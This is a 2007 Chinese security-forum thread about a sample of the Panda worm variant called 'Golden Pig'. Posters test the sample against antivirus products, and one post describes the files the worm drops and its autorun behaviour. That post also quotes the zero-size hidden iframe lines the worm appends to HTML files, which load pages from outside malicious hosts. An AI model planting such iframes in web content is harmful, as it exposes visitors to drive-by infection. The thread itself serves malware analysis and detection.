今天下午拿到的熊猫新变种－－金猪！

显示全部楼层 · 发表于 2007-1-24 09:54:08

...

显示全部楼层 · 发表于 2007-2-1 11:07:57

我没种

显示全部楼层 · 发表于 2007-2-1 13:27:00

假金猪一个，不过是老版本的熊猫换了个金猪图标，或者是另外一个版本的金猪。这个会在c:\windows\system32\drivers\下生成sppoolsv.exe文件，就是病毒本身，而不是网上说的ncscv32.exe，感染过的目录中生成desktop_.ini，也不是网上说的desktop__.ini，病毒还会在每个盘根目录下生成setup.exe和autorun.inf，且这个病毒不检查是否运行于虚拟机中，真金猪是会检查的，探测到虚拟机会自动退出。这个病毒在htm文件尾部添加的是<iframe src=http://music.netxshell.com/w/et.htm width=0 height=0></iframe>，仍旧不是网上说的<iframe src=http://www.lovebak.com/qq.htm width="0" height="0"></iframe>

而且病毒体内也找不到下面这些字样
asdf
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
adsf
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
hjjjjjj
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!

所以说这个要不就是假金猪，要不就是另外一个版本的金猪

显示全部楼层 · 发表于 2007-2-1 14:14:14

这个我的卡巴报了，还给清除了，微点也报了

显示全部楼层 · 发表于 2007-2-1 14:43:50

卡巴报307报警

显示全部楼层 · 发表于 2007-2-1 14:46:53

nod32报，AVG报，测试通过

显示全部楼层 · 发表于 2007-2-1 17:22:37

看看

显示全部楼层 · 发表于 2007-2-1 22:57:26

怎么我的两杀软那么牛哈我的卡巴、微点都报了轻轻松松就把它给干掉了

显示全部楼层 · 发表于 2007-2-2 10:29:45

看来众说不一呀～～
艾

显示全部楼层 · 发表于 2007-2-2 13:29:03

咖啡报了呀！我的是2007安全套装。

[病毒样本] 今天下午拿到的熊猫新变种－－金猪！

评分

本帖子中包含更多资源